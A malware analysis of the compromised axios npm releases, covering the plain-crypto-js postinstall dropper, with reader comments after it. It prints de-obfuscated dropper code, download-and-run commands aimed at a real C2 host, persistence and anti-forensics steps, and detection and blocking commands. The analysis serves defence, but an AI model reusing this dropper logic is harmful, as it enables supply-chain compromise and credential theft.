The 56 crypto source files are not just similar; they are bit-for-bit identical to the corresponding files in the legitimate crypto-js@4.2.0 package published by Evan Vosberg. The attacker made no modifications to the cryptographic library code whatsoever. This was intentional: any diff-based analysis comparing plain-crypto-js against crypto-js would find nothing suspicious in the library files and would focus attention on package.json — where the postinstall hook looks, at a glance, like a standard build or setup task.
The anti-forensics stub (package.md) deserves particular attention. After setup.js runs, it renames package.md to package.json. The stub reports version 4.2.0 — not 4.2.1:
// Contents of package.md (the clean replacement stub)
{
"name": "plain-crypto-js",
"version": "4.2.0", // ← reports 4.2.0, not 4.2.1 — deliberate mismatch
"description": "JavaScript library of crypto standards.",
"license": "MIT",
"author": { "name": "Evan Vosberg", "url": "http://github.com/evanvosberg" },
"homepage": "http://github.com/brix/crypto-js",
"repository": { "type": "git", "url": "http://github.com/brix/crypto-js.git" },
"main": "index.js",
// No "scripts" key — no postinstall, no test
"dependencies": {}
}
This creates a secondary deception layer. After infection, running npm list in the project directory will report plain-crypto-js@4.2.0 — because npm list reads the version field from the installed package.json, which now says 4.2.0. An incident responder checking installed packages would see a version number that does not match the malicious 4.2.1 version they were told to look for, potentially leading them to conclude the system was not compromised.
# What npm list reports POST-infection (after the package.json swap):
$ npm list plain-crypto-js
myproject@1.0.0
└── plain-crypto-js@4.2.0 # ← reports 4.2.0, not 4.2.1
# but the dropper already ran as 4.2.1
# The reliable check is the DIRECTORY PRESENCE, not the version number:
$ ls node_modules/plain-crypto-js
aes.js cipher-core.js core.js ...
# If this directory exists at all, the dropper ran.
# plain-crypto-js is not a dependency of ANY legitimate axios version.
The difference between the real crypto-js@4.2.0 and the malicious plain-crypto-js@4.2.1 is a single field in package.json:
// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)
{
"name": "crypto-js",
"version": "4.2.0",
"description": "JavaScript library of crypto standards.",
"author": "Evan Vosberg",
"homepage": "http://github.com/brix/crypto-js",
"scripts": {
"test": "grunt" // ← no postinstall
}
}
// plain-crypto-js@4.2.1 (MALICIOUS — nrwise@proton.me)
{
"name": "plain-crypto-js", // ← different name, everything else cloned
"version": "4.2.1", // ← version one ahead of the real package
"description": "JavaScript library of crypto standards.",
"author": { "name": "Evan Vosberg" }, // ← fraudulent use of real author name
"homepage": "http://github.com/brix/crypto-js", // ← real repo, wrong package
"scripts": {
"test": "grunt",
"postinstall": "node setup.js" // ← THE ONLY DIFFERENCE. The entire weapon.
}
}
The attacker published axios@1.14.1 and axios@0.30.4 with plain-crypto-js: "^4.2.1" added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.
Dependency comparison between clean and compromised versions:
When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js’s postinstall script, launching the dropper.
Phantom dependency: A grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()’d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.
A complete binary diff between axios@1.14.0 and axios@1.14.1 across all 86 files (excluding source maps) reveals that exactly one file changed: package.json. Every other file — all 85 library source files, type definitions, README, CHANGELOG, and compiled dist bundles — is bit-for-bit identical between the two versions.
# File diff: axios@1.14.0 vs axios@1.14.1 (86 files, source maps excluded)
DIFFERS: package.json
Total differing files: 1
Files only in 1.14.1: (none)
Files only in 1.14.0: (none)
The complete package.json diff:
# --- axios/package.json (1.14.0)
# +++ axios/package.json (1.14.1)
- "version": "1.14.0",
+ "version": "1.14.1",
"scripts": {
"fix": "eslint --fix lib/**/*.js",
- "prepare": "husky"
},
"dependencies": {
"follow-redirects": "^2.1.0",
"form-data": "^4.0.1",
"proxy-from-env": "^2.1.0",
+ "plain-crypto-js": "^4.2.1"
}
Two changes are visible: the version bump (1.14.0 → 1.14.1) and the addition of plain-crypto-js. There is also a third, less obvious change: the "prepare": "husky" script was removed. husky is the git hook manager used by the axios project to enforce pre-commit checks. Its removal from the scripts section is consistent with a manual publish that bypassed the normal development workflow — the attacker edited package.json directly without going through the project's standard release tooling, which would have re-added the husky prepare script.
The same analysis applies to axios@0.30.3 → axios@0.30.4:
# --- axios/package.json (0.30.3)
# +++ axios/package.json (0.30.4)
- "version": "0.30.3",
+ "version": "0.30.4",
"dependencies": {
"follow-redirects": "^1.15.4",
"form-data": "^4.0.4",
"proxy-from-env": "^1.1.0",
+ "plain-crypto-js": "^4.2.1"
}
Again — exactly one substantive change: the malicious dependency injection. The version bump itself (from 0.30.3 to 0.30.4) is simply the required npm version increment to publish a new release; it carries no functional significance.
setup.js - Static Analysis

setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers.
All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:
_trans_1(x, r) — XOR cipher. The key "OrDeR_7077" is parsed through JavaScript’s Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as:
charCode XOR key[(7 × r × r) % 10] XOR 333
_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.
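Both layers are easy to reproduce from this description. The following is our reconstruction (not the attacker's original code) of the two decode functions:

```javascript
// Reconstruction of the string-table decoders described above.
// Number() turns every non-digit of "OrDeR_7077" into NaN, and NaN coerces
// to 0 in bitwise operations — so only the four digits survive in the key.
const KEY = "OrDeR_7077".split("").map(c => Number(c) | 0);
// KEY → [0, 0, 0, 0, 0, 0, 7, 0, 7, 7]

// Inner layer. XOR is its own inverse, so trans1 both encodes and decodes.
function trans1(s) {
  return s.split("").map((ch, r) =>
    String.fromCharCode(ch.charCodeAt(0) ^ KEY[(7 * r * r) % 10] ^ 333)
  ).join("");
}

// Outer layer: reverse, restore base64 padding, decode as UTF-8, then trans1.
function trans2(x) {
  const b64 = x.split("").reverse().join("").replace(/_/g, "=");
  return trans1(Buffer.from(b64, "base64").toString("utf8"));
}

console.log(trans1(trans1("child_process"))); // → child_process
```

Feeding the encoded stq[] entries through trans2 yields the plaintext table below.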
The dropper’s entry point is _entry("6202033"), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033
StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:
stq[0] → "child_process" // shell execution
stq[1] → "os" // platform detection
stq[2] → "fs" // filesystem operations
stq[3] → "http://sfrclak.com:8000/" // C2 base URL
stq[5] → "win32" // Windows platform identifier
stq[6] → "darwin" // macOS platform identifier
stq[12] → "curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &"
stq[13] → "package.json" // deleted after execution
stq[14] → "package.md" // clean stub renamed to package.json
stq[15] → ".exe"
stq[16] → ".ps1"
stq[17] → ".vbs"
The complete attack path from npm install to C2 contact and cleanup, across all three target platforms.

With all strings decoded, the dropper's full logic can be reconstructed and annotated. The following is a de-obfuscated, commented version of the _entry() function that constitutes the entire dropper payload. Original variable names are preserved; comments are added for clarity.
// setup.js — de-obfuscated and annotated
// SHA-256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
const _entry = function(campaignId) {
try {
// Load Node.js built-in modules via decoded string table
const fs = require("fs"); // stq[2]
const os = require("os"); // stq[1]
const { execSync } = require("child_process"); // stq[0]
// Build the full C2 URL: base + campaign ID
// stq[3] = "http://sfrclak.com:8000/"
const c2Url = "http://sfrclak.com:8000/" + campaignId;
// → "http://sfrclak.com:8000/6202033"
// Detect the operating system
const platform = os.platform(); // "darwin", "win32", or other
const tmpDir = os.tmpdir(); // "/tmp" on Linux/macOS, "%TEMP%" on Windows
// os.type(), os.release(), os.arch() are called but results discarded —
// likely sends them via the POST body or they are used in the stage-2
os.type(); os.release(); os.arch();
let execCommand = "";
// ─────────────────────────────────────────────────
// BRANCH 1: macOS (darwin)
// ─────────────────────────────────────────────────
if (platform === "darwin") {
const scriptPath = tmpDir + "/" + campaignId; // /tmp/6202033
const appleScript = `
set {a, s, d} to {"", "${c2Url}", "/Library/Caches/com.apple.act.mond"}
try
do shell script "curl -o " & d & a & " -d packages.npm.org/product0" & " -s " & s & " && chmod 770 " & d & " && /bin/zsh -c \\"" & d & " " & s & " &\\" &> /dev/null"
end try
do shell script "rm -rf ${scriptPath}"`;
fs.writeFileSync(scriptPath, appleScript);
execCommand = `nohup osascript "${scriptPath}" > /dev/null 2>&1 &`;
// ─────────────────────────────────────────────────
// BRANCH 2: Windows (win32)
// ─────────────────────────────────────────────────
} else if (platform === "win32") {
const psPath = execSync("where powershell").toString().trim();
const wtPath = process.env.PROGRAMDATA + "\\wt.exe";
if (!fs.existsSync(wtPath)) {
fs.copyFileSync(psPath, wtPath);
// Creates a persistent copy of PowerShell. wt.exe is Windows Terminal's
// binary name — a legitimate-looking process in %PROGRAMDATA%.
}
const ps1Path = tmpDir + "\\" + campaignId + ".ps1"; // %TEMP%\6202033.ps1
const vbsPath = tmpDir + "\\" + campaignId + ".vbs"; // %TEMP%\6202033.vbs
const vbScript = `
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c curl -s -X POST -d ""packages.npm.org/product1"" ""${c2Url}"" > ""${ps1Path}"" & ""${wtPath}"" -w hidden -ep bypass -file ""${ps1Path}"" ""${c2Url}"" & del ""${ps1Path}"" /f", 0, False`;
fs.writeFileSync(vbsPath, vbScript);
execCommand = `cscript "${vbsPath}" //nologo && del "${vbsPath}" /f`;
// ─────────────────────────────────────────────────
// BRANCH 3: Linux / other
// ─────────────────────────────────────────────────
} else {
execCommand = `curl -o /tmp/ld.py -d packages.npm.org/product2 -s ${c2Url} && nohup python3 /tmp/ld.py ${c2Url} > /dev/null 2>&1 &`;
// curl and nohup chained with &&: nohup only runs if curl succeeded.
// If the C2 is unreachable, chain silently fails — npm install still exits 0.
}
// execSync is blocking, but all three commands return immediately because
// the real work is detached to background processes (nohup / cscript 0,False)
execSync(execCommand);
// ─────────────────────────────────────────────────
// ANTI-FORENSICS: cover tracks
// ─────────────────────────────────────────────────
const selfPath = __filename;
fs.unlink(selfPath, () => {}); // 1. Delete setup.js itself
fs.unlink("package.json", () => {}); // 2. Delete malicious package.json
fs.rename("package.md", "package.json", () => {}); // 3. Install clean v4.2.0 stub
} catch(e) {
// Silent catch — any error (C2 unreachable, permission denied, etc.)
// is swallowed completely. npm install always exits with code 0.
// The developer never sees any indication that anything went wrong.
}
};
// Entry point — "6202033" is the campaign/tracking ID
_entry("6202033");
- try/catch. The entire _entry() function is wrapped in a single try/catch that swallows all errors with an empty handler. If the C2 is unreachable, if the user has no write permission to the target path, or if any step fails, the dropper exits silently and npm install completes with exit code 0. There is no error output, no warning, nothing.
- execSync is blocking, but the payloads are not. The dropper uses execSync(execCommand) — a synchronous, blocking call. However, all three platform execution commands end with & (Linux/macOS) or use cscript ... 0, False (Windows), which immediately detach the process and return. So execSync returns almost instantly — the dropper doesn't block npm install for more than a fraction of a second.
- && chain on Linux is a liveness check. curl ... && nohup python3 ... — if curl fails (C2 unreachable, no network), the nohup command never executes. This ensures npm install never fails, even when the C2 is unavailable.
- copyFileSync conditional creates persistence. if (!fs.existsSync(wtPath)) { fs.copyFileSync(psPath, wtPath); } — the copy only runs if %PROGRAMDATA%\wt.exe does not already exist. Once created, this file persists across reinstalls and reboots. Even if the victim removes plain-crypto-js and reinstalls clean dependencies, wt.exe remains in %PROGRAMDATA% as a dormant copy of PowerShell available to any future payload.

On macOS (darwin), the dropper writes an AppleScript to /tmp/6202033 and executes it silently via nohup osascript. The AppleScript contacts the C2 with POST body packages.npm.org/product0, downloads the macOS RAT binary, saves it to /Library/Caches/com.apple.act.mond (mimicking an Apple system cache file), makes it executable (chmod 770), and launches it via /bin/zsh. The script then deletes itself.
The name com.apple.act.mond likely abbreviates "Activity Monitor Daemon" to blend with legitimate Apple processes using Apple's reverse-DNS daemon naming convention.
On Windows (win32):
- Runs where powershell to locate the binary
- Copies PowerShell to %PROGRAMDATA%\wt.exe (disguised as Windows Terminal)
- Writes a VBScript (.vbs) to the temp directory, executed via cscript //nologo in a hidden cmd.exe window
- The VBScript uses curl to fetch the PowerShell stage-2 to %TEMP%\6202033.ps1, executes it with -WindowStyle Hidden and -ExecutionPolicy Bypass, then self-deletes

Persistent artifact: %PROGRAMDATA%\wt.exe (copy of PowerShell).
On Linux and all other platforms:
curl -o /tmp/ld.py \
-d packages.npm.org/product2 \
-s http://sfrclak.com:8000/6202033 \
&& nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 > /dev/null 2>&1 &
C2 returns a Python RAT script saved to /tmp/ld.py and executed in background, detached from the npm process tree.
The following are the complete, fully resolved payloads as they execute on victim machines, with all template placeholders replaced with actual values using campaign ID 6202033 and C2 base URL http://sfrclak.com:8000/.
macOS: /tmp/6202033

-- Written to: /tmp/6202033
-- Executed via: nohup osascript "/tmp/6202033" > /dev/null 2>&1 &
-- This file is deleted by the script itself in the final do shell script line
set {a, s, d} to {"", "http://sfrclak.com:8000/6202033", "/Library/Caches/com.apple.act.mond"}
try
do shell script "curl -o " & d & a & " -d packages.npm.org/product0" & " -s " & s & " && chmod 770 " & d & " && /bin/zsh -c \"" & d & " " & s & " &\" &> /dev/null"
end try
do shell script "rm -rf /tmp/6202033"
When executed, this AppleScript expands to the following shell command:
curl -o /Library/Caches/com.apple.act.mond \
-d packages.npm.org/product0 \
-s http://sfrclak.com:8000/6202033 \
&& chmod 770 /Library/Caches/com.apple.act.mond \
&& /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &" \
>& /dev/null
Windows: %TEMP%\6202033.vbs

' Written to: %TEMP%\6202033.vbs
' Executed via: cscript "%TEMP%\6202033.vbs" //nologo && del "%TEMP%\6202033.vbs" /f
' objShell.Run arg 2=0 (hidden window), arg 3=False (don't wait for completion)
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c curl -s -X POST -d ""packages.npm.org/product1"" ""http://sfrclak.com:8000/6202033"" > ""%TEMP%\6202033.ps1"" & ""powershell.exe"" -w hidden -ep bypass -file ""%TEMP%\6202033.ps1"" ""http://sfrclak.com:8000/6202033"" & del ""%TEMP%\6202033.ps1"" /f", 0, False
Linux / other: execSync shell command

# Executed directly via execSync() in Node.js — no intermediate file
curl -o /tmp/ld.py \
-d packages.npm.org/product2 \
-s http://sfrclak.com:8000/6202033 \
&& nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 > /dev/null 2>&1 &
The & at the end detaches nohup from the shell started by execSync, causing it to be re-parented to PID 1 (init) when that shell exits, as confirmed in the Harden-Runner process events where nohup (PID 2400) shows ppid: 1.
The dropper's if/else if/else chain covers darwin, win32, and everything else (Linux). There is no explicit check for "linux" — anything that is not macOS or Windows falls through to the Linux command. This means the dropper also targets FreeBSD, Android (Node.js on Termux), and any other Unix-like system where curl and python3 are available. Container environments running Node.js are equally affected.
Each platform sends a distinct POST body to the same C2 endpoint:
- macOS: packages.npm.org/product0
- Windows: packages.npm.org/product1
- Linux / other: packages.npm.org/product2

The packages.npm.org/ prefix attempts to make traffic appear as benign npm registry communication in network logs and SIEMs.

After launching the platform-specific payload, setup.js performs three forensic cleanup steps in sequence:
1. fs.unlink(__filename) — removes setup.js from node_modules/plain-crypto-js/
2. fs.unlink("package.json") — removes the file containing "postinstall": "node setup.js"
3. fs.rename("package.md", "package.json") — the pre-staged clean stub (reporting version 4.2.0, no scripts) replaces the malicious manifest
Post-infection inspection of node_modules/plain-crypto-js/package.json shows a completely clean manifest. Running npm audit reveals nothing. The only persistent evidence is the existence of the node_modules/plain-crypto-js/ directory itself — this package never appeared in any legitimate axios version.
Why the directory presence still matters: Even after cleanup, the existence of node_modules/plain-crypto-js/ is sufficient evidence of compromise — this package is not a dependency of any legitimate axios version. If you find this directory, the dropper ran.
Static analysis of the obfuscated dropper told us what the malware intended to do. To confirm it actually executes as designed, we installed axios@1.14.1 inside a GitHub Actions runner instrumented with StepSecurity Harden-Runner in audit mode. Harden-Runner captures every outbound network connection, every spawned process, and every file write at the kernel level — without interfering with execution in audit mode, giving us a complete ground-truth picture of what happens the moment npm install runs.
The full Harden-Runner insights for this run are publicly accessible:
app.stepsecurity.io/github/actions-security-demo/compromised-packages/actions/runs/23776116077

The network event log contains two outbound connections to sfrclak.com:8000 — but what makes this particularly significant is when they occur:
curl → sfrclak.com:8000 • calledBy: infra
nohup → sfrclak.com:8000 • calledBy: infra

Two things stand out immediately:

- The first connection (curl, PID 2401) fires 1.1 seconds into the npm install — at 01:30:51Z, just 2 seconds after npm install began at 01:30:49Z. The postinstall hook triggered, decoded its strings, and was making an outbound HTTP connection to an external server before npm had finished resolving all dependencies.
- The second connection (nohup, PID 2400) occurs 36 seconds later, in an entirely different workflow step — “Verify axios import and version.” The npm install step was long finished. The malware had persisted into subsequent steps, running as a detached background process. This is the stage-2 Python payload (/tmp/ld.py) making a callback — alive and independent of the process that spawned it.

Why both connections show calledBy: "infra": When Harden-Runner can trace a network call to a specific Actions step through the runner process tree, it labels it "runner". The "infra" label means the process making the connection could not be attributed to a specific step — because the dropper used nohup ... & to detach from the process tree. The process was deliberately orphaned to PID 1 (init), severing all parent-child relationships. This is the malware actively evading process attribution.
Harden-Runner captures every execve syscall. The raw process events reconstruct the exact execution chain from npm install to C2 contact:
PID 2366 bash /home/runner/work/_temp/***.sh [01:30:48.186Z]
└─ PID 2380 env node npm install axios@1.14.1 [01:30:49.603Z]
└─ PID 2391 sh -c "node setup.js" [01:30:50.954Z]
│ cwd: node_modules/plain-crypto-js ← postinstall hook fires
└─ PID 2392 node setup.js [01:30:50.955Z]
│ cwd: node_modules/plain-crypto-js
└─ PID 2399 /bin/sh -c "curl -o /tmp/ld.py \ [01:30:50.978Z]
-d packages.npm.org/product2 \
-s http://sfrclak.com:8000/6202033 \
&& nohup python3 /tmp/ld.py \
http://sfrclak.com:8000/6202033 \
> /dev/null 2>&1 &"
PID 2401 curl -o /tmp/ld.py -d packages.npm.org/product2 [01:30:50.979Z]
ppid: 2400 ← child of nohup
PID 2400 nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 [01:31:27.732Z]
ppid: 1 ← ORPHANED TO INIT — detached from npm process tree
The process tree confirms the exact execution chain decoded statically from setup.js. Four levels of process indirection separate the original npm install from the C2 callback: npm → sh → node → sh → curl/nohup. The nohup process (PID 2400) reporting ppid: 1 is the technical confirmation of the daemonization technique — by the time npm install returned successfully, a detached process was already running /tmp/ld.py in the background.
The file event log captures every file write by PID. The plain-crypto-js/package.json entry shows two writes from two different processes — directly confirming the anti-forensics technique described in static analysis:
File: node_modules/plain-crypto-js/package.json
Write 1 — pid=2380 (npm install) ts=01:30:50.905Z
Malicious package.json written to disk during install.
Contains: { "postinstall": "node setup.js" }
Write 2 — pid=2392 (node setup.js) ts=01:31:27.736Z [+36s]
Dropper overwrites package.json with clean stub from package.md.
Contains: version 4.2.0 manifest, no scripts, no postinstall.
The 36-second gap between the two writes is the execution time of the dropper — it wrote the second file only after successfully launching the background payload. Harden-Runner flagged this as a “Source Code Overwritten” file integrity event. Post-infection, any tool that reads node_modules/plain-crypto-js/package.json will see the clean manifest. The write event log is the only runtime artifact that proves the swap occurred.

Malicious npm Packages
Network Indicators
File System Indicators
Attacker-Controlled Accounts
Safe Version Reference
Step 1 – Check for the malicious axios versions in your project:
npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"
Step 2 – Check for plain-crypto-js in node_modules:
ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED"
If setup.js already ran, package.json inside this directory will have been replaced with a clean stub. The presence of the directory alone is sufficient evidence the dropper executed.
Step 3 – Check for RAT artifacts on affected systems:
# macOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"
# Linux
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED"
"COMPROMISED"
# Windows (cmd.exe)
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED
Step 4 – Check CI/CD pipelines:
Review pipeline logs for any npm install executions that may have pulled axios@1.14.1 or axios@0.30.4. Any pipeline that installed either version should be treated as compromised and all injected secrets rotated immediately.
1. Downgrade axios to a clean version and pin it.
npm install axios@1.14.0 # for 1.x users
npm install axios@0.30.3 # for 0.x users
2. Add an overrides block to prevent transitive resolution back to the malicious versions:
{
"dependencies": { "axios": "1.14.0" },
"overrides": { "axios": "1.14.0" },
"resolutions": { "axios": "1.14.0" }
}
3. Remove plain-crypto-js from node_modules.
rm -rf node_modules/plain-crypto-js
npm install --ignore-scripts
4. If a RAT artifact is found: treat the system as fully compromised. Do not attempt to clean in place - rebuild from a known-good state. Rotate all credentials on any system where the malicious package ran: npm tokens, AWS access keys, SSH private keys, cloud credentials (GCP, Azure), CI/CD secrets, and any values present in .env files accessible at install time.
5. Audit CI/CD pipelines for runs that installed the affected versions. Any workflow that executed npm install with these versions should have all injected secrets rotated.
6. Use --ignore-scripts in CI/CD as a standing policy to prevent postinstall hooks from running during automated builds:
npm ci --ignore-scripts
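The same policy can be committed to the repository so local developer installs get identical protection by default (a suggested addition, not part of the original remediation list):

```ini
# .npmrc at the repository root — applies to local installs and CI alike
ignore-scripts=true
```

Note that this disables all lifecycle scripts, including legitimate ones (e.g. native-module builds), so packages that genuinely need them must be rebuilt explicitly.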
7. Block C2 traffic at the network/DNS layer as a precaution on any potentially exposed system
# Block via firewall (Linux)
iptables -A OUTPUT -d 142.11.206.73 -j DROP
# Block via /etc/hosts (macOS/Linux)
echo "0.0.0.0 sfrclak.com" >> /etc/hosts
Harden-Runner is a purpose-built security agent for CI/CD runners.
It enforces a network egress allowlist in GitHub Actions, restricting outbound network traffic to only allowed endpoints. Both DNS and network-level enforcement prevent covert data exfiltration. The C2 callback to sfrclak.com:8000 and the payload fetch in the postinstall script would have been blocked at the network level before the RAT could be delivered.
Harden-Runner also automatically logs outbound network traffic per job and repository, establishing normal behavior patterns and flagging anomalies. This reveals whether malicious postinstall scripts executed exfiltration attempts or contacted suspicious domains, even when the malware self-deletes its own evidence afterward. The C2 callback to sfrclak.com:8000 was flagged as anomalous because it had never appeared in any prior workflow run.

Supply chain attacks like this one do not stop at the CI/CD pipeline. The malicious postinstall script in plain-crypto-js@4.2.1 drops a cross-platform RAT designed to run on the developer's own machine, harvesting credentials, SSH keys, cloud tokens, and other secrets from the local environment. Every developer who ran npm install with the compromised axios version outside of CI is a potential point of compromise.
StepSecurity Dev Machine Guard gives security teams real-time visibility into npm packages installed across every enrolled developer device. When a malicious package is identified, teams can immediately search by package name and version to discover all impacted machines, as shown below with axios@1.14.1 and axios@0.30.4.

Newly published npm packages are temporarily blocked during a configurable cooldown window. When a PR introduces or updates to a recently published version, the check automatically fails. Since most malicious packages are identified within 24 hours, this creates a crucial safety buffer. In this case, plain-crypto-js@4.2.1 was published hours before the axios releases, so any PR updating to axios@1.14.1 or axios@0.30.4 during the cooldown period would have been blocked automatically.

StepSecurity maintains a real-time database of known malicious and high-risk npm packages, updated continuously, often before official CVEs are filed. If a PR attempts to introduce a compromised package, the check fails and the merge is blocked. Both axios@1.14.1 and plain-crypto-js@4.2.1 were added to this database within minutes of detection.

Search across all PRs in all repositories across your organization to find where a specific package was introduced. When a compromised package is discovered, instantly understand the blast radius: which repos, which PRs, and which teams are affected. This works across pull requests, default branches, and dev machines.

AI Package Analyst continuously monitors the npm registry for suspicious releases in real time, scoring packages for supply chain risk before you install them. In this case, both axios@1.14.1 and plain-crypto-js@4.2.1 were flagged within minutes of publication, giving teams time to investigate, confirm malicious intent, and act before the packages accumulated significant installs. Alerts include the full behavioral analysis, decoded payload details, and direct links to the OSS Security Feed.

StepSecurity has published a threat intel alert in the Threat Center with all relevant links to check if your organization is affected. The alert includes the full attack summary, technical analysis, IOCs, affected versions, and remediation steps, so teams have everything needed to triage and respond immediately. Threat Center alerts are delivered directly into existing SIEM workflows for real-time visibility.

We want to thank the axios maintainers and the community members who quickly identified and triaged the compromise in GitHub issue #10604. Their rapid response, collaborative analysis, and clear communication helped the ecosystem understand the threat and take action within hours.
We also want to thank GitHub for swiftly suspending the compromised account and npm for quickly unpublishing the malicious axios versions and placing a security hold on plain-crypto-js. The coordinated response across maintainers, GitHub, and npm significantly limited the window of exposure for developers worldwide.
How do you handle updating dependencies then?
People are trying to automate the act of programming itself, with AI, let alone all the bits and pieces of build processes and maintenance.
And the chances of staying undetected are higher if nobody is installing until the delay time elapses.
It's the same as not scheduling all cronjobs to midnight.
Updating packages takes longer, but we try to keep packages to a minimum, so it ends up not being that big a deal.
But raw.githubusercontent.com still contains code, and now the attacker can publish whatever code he wants, no?!
Don't get me wrong: I love the idea to secure as much as possible. I'm running VMs and containerizing and I eat firewalling rules for breakfast, my own unbound DNS with hundreds of thousands (if not millions) of domains blocked, etc. I'm not the "YOLO" kind of guy.
But I don't understand what's that different between raw.githubusercontent.com and github.com? Is it for exploits that are not directly in the source code? Can you explain a bit more?
"Zero deps. One file." People prefer hand-written comments over LLM-written ones.
"Already detects the hijacked maintainer email on the current safe version." You simply flag all proton email addresses.
To be honest - and I can't really believe I'm saying it - what I really want is something more like Android permissions. (Except more granular file permissions, which Android doesn't do at all well.) Like: start with nothing, app is requesting x access, allow it this time; oh alright fine always allow it. Central place to manage it later. Etc.
1- automatically add bearer tokens to requests rather than manually specifying them every single time
2- automatically dispatch some event or function when a 401 response is returned to clear the stale user session and return them to a login page.
There's no reason to repeat this logic in every single place you make an API call.
Likewise, every response I get is JSON. There's no reason to manually unwrap the response into JSON every time.
Finally, there's some nice mocking utilities for axios for unit testing different responses and error codes.
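The two items above (auth-header injection and global 401 handling) are exactly what interceptors centralize. As a rough sketch of the pattern itself — this is a hypothetical minimal client, not axios's actual API — here is the idea with the transport stubbed out so the logic is testable:

```javascript
// Hypothetical sketch of the interceptor pattern: inject a bearer token
// on every request and react to 401s in one place. `transport` stands in
// for fetch so the wiring can be exercised without a network.
function makeClient({ token, onUnauthorized, transport }) {
  return async function request(url, options = {}) {
    const headers = {
      ...(options.headers || {}),
      Authorization: `Bearer ${token}`, // added automatically, never repeated at call sites
    };
    const res = await transport(url, { ...options, headers });
    if (res.status === 401) {
      onUnauthorized(); // e.g. clear the stale session, redirect to login
      throw new Error("unauthorized");
    }
    return res;
  };
}
```

With `transport: fetch` this behaves like a tiny subset of what axios interceptors give you, without the dependency.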
You're either going to copy/paste code everywhere, or you will write your own helper functions and never touch fetch directly. Axios... just works. No need to reinvent anything, and there's a ton of other handy features the GP mentioned as well you may or may not find yourself needing.
Most npm CVEs are stuff like DDoS vulnerabilities, and you should have mitigations for those in place at the infra level anyway (e.g. request timeouts, rate limits, etc), or you are pretty much guaranteed to be cooked sooner or later anyway. The really dangerous stuff like arbitrary command execution from a library that takes end user input is much much more rare. The most recent big one I remember is React2shell.
Number 2 hasn't been much of an issue for a long time. npm doesn't allow unpublishing a package after 72 hours (apart from under certain rare conditions).
Don't know about number 3. Would feel to me that if you have something running that can modify the lockfile, they can probably also modify the checked-in tars.
I can see how zero-installs are useful under some specific constraints where you want to minimize dependencies to external services, e.g. when your CI runs under strict firewalls. But for most, nah, not worth it.
It's what we call in France "la fête du slip".
PS: that's one reason I try to use git submodules in my Common Lisp projects instead of QuickLisp, because I really see the size of my deptree this way.
I know 90% of people I've worked with will never know these options exist.
I like to think of it like working with dangerous chemicals in the lab. Back in the days, people were sloppy and eventually got cancer. Then dangers were recognized and PPE was developed and became a requirement.
We are now at the stage in software development where we are beginning to recognize the hazards and to develop and mandate use of proper PPE.
A couple of years ago, pip started refusing to install packages outside of a virtualenv. I'm guessing/hoping package managers will start to have an opt-in flag you can set in a system-wide config file, such that they refuse to run outside of a sandbox.
That way Han Solo can make sense in the infamous quote.
EDIT: even Gemini gets this wrong:
> In Star Wars, a parsec is a unit of distance, not time, representing approximately 3.26 light-years
(Hope your timezones and tzdata correctly identifies Easter bank holiday as non-workdays)
You get zero-day patches 7 days later if there's no proper monitoring for important patches, or if this specific patch isn't on the important list. Always a tradeoff.
find / -type f -path '*/node_modules/axios/package.json' \
-exec grep -Pl '"version"\s*:\s*"(1\.14\.1|0\.30\.4)"' {} + 2>/dev/null
Let’s not encourage people to respond to security incidents by… copy/pasting random commands they don’t understand.
Because all mainstream packages are published via CI/CD pipeline, not by an MFA'd individual uploading a GZIP to npm.com.
This became evident, what, perhaps a few years ago? Probably since childhood for some users here but just wondering what the holdup is. Lots of bad press could be avoided, or at least a little.
Yes, they cannot include everything, but enough that you do not _need_ third party packages.
For C#, I think they achieved that.
The amount of time defining same data structures over and over again vs `pip install requests` with well defined data structures.
Yes, the fewer deps people need the better, but it doesn't fix the core problem. Sharing and distributing code is a key tenet of being able to write modern code.
Which dependency? It sounds like you are assuming some specific scenario, whereas the fix can take many forms. In immediate term, the quickest step could be to simply disable some feature. A later step may be vendoring in a safe implementation.
The registry doesn’t need to be actually down for you, either; the necessary condition is that your CI infrastructure can’t reach it.
> cases where npm CVEs must be patched with such urgency or bad things will happen are luckily very rare, in my experience.
Not sure what you mean by “npm CVEs”. The registry? The CLI tool?
